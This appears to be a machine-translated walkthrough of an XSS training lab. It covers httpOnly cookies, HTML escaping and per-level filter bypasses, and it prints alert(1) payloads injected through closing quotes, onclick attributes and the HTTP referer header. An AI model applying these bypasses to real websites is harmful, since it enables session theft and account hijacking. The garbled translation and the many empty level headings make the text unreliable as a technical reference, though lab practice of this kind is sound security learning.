httponly: If you give someone cookie Set up httpOnly attribute , They can't get through JS Script Read the cookie Information about , But Application Manual modification in cookie, So it can only prevent XSS attack , It's not absolutely safe
Although set httponly After that, I can't get cookie, But it still exists xss Cross site statement , It's just the acquisition that's blocked cookie
You can take the account number and password directly ,cookie Sign in . The browser did not save the read password : need xss Generated from the login address , Hijacking with forms The browser saves the account face ： Produced in the background XSS, For example, storage type XSS
By hand xss Cross site loopholes ：
The first level ：
The second level ：
escaped , View the source code .
There is htmlsecialchars() function ：
Converting symbols into physical labels ,xss Frequent filtering
The second level ：
Close the front double quotes ,"><script>alert(1)</script>
The third level ：
Or right <> It's escaped , Use the form's mouse click Properties . 'onclick='alert(1)
The fourth level ：
The fifth level ：
The sixth level ：
Continue with the code for level five , Find out herf Filtered , View the source code .
The seventh level ：
and upload-labs equally , There's no loop filtering in the code , So you can double write around
The eighth level ：
Case write , Neither writing nor writing , Replace with unicode code
The Ninth level ：
This level is almost difficult to complete without looking at the code , The code detects the presence of http://
The tenth level ：
View the source code , The discovery attribute is hidden, It's hidden .
The eleventh level ：
http referer head , Source of detection . The browser detects this JS Whether the code comes from CSRF Cross site request script , Source of detection . The administrator is in the login state , The login triggers a string of passwords for adding administrator accounts , An administrator is added . Source of detection , That's the same origin strategy of the browser , See if it's from the same domain , Not the same domain name is not accepted token Verification will solve this problem This level is referer Head input &t_sort="type="="type="text"onclick="alert(1)"
Pass 12 ：
testing user-agent aizhan There are also cross sites in the Internet The following levels are also various hidden attributes , It's basically similar , No more records .